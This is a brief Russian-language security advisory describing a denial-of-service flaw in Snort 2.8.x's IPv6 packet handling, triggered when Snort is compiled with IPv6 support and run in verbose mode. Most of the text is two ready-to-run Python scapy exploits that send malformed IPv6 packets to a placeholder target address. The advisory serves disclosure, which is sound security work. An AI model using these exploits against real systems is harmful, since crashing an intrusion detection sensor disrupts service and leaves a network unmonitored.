Программа: Snort 2.8.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке IPv6 пакетов. Атакующий может передать специально сформированные
пакеты, что приведет к отказу системы в обслуживании. Эксплуатирование
уязвимости требует, чтобы Snort была скомпилирована с опцией "--enable-ipv6" и
запущена с опцией командной строки "-v".
Эксплоит:
1) Работает на x86 системах:
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) Работает на x86 и x64:
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)
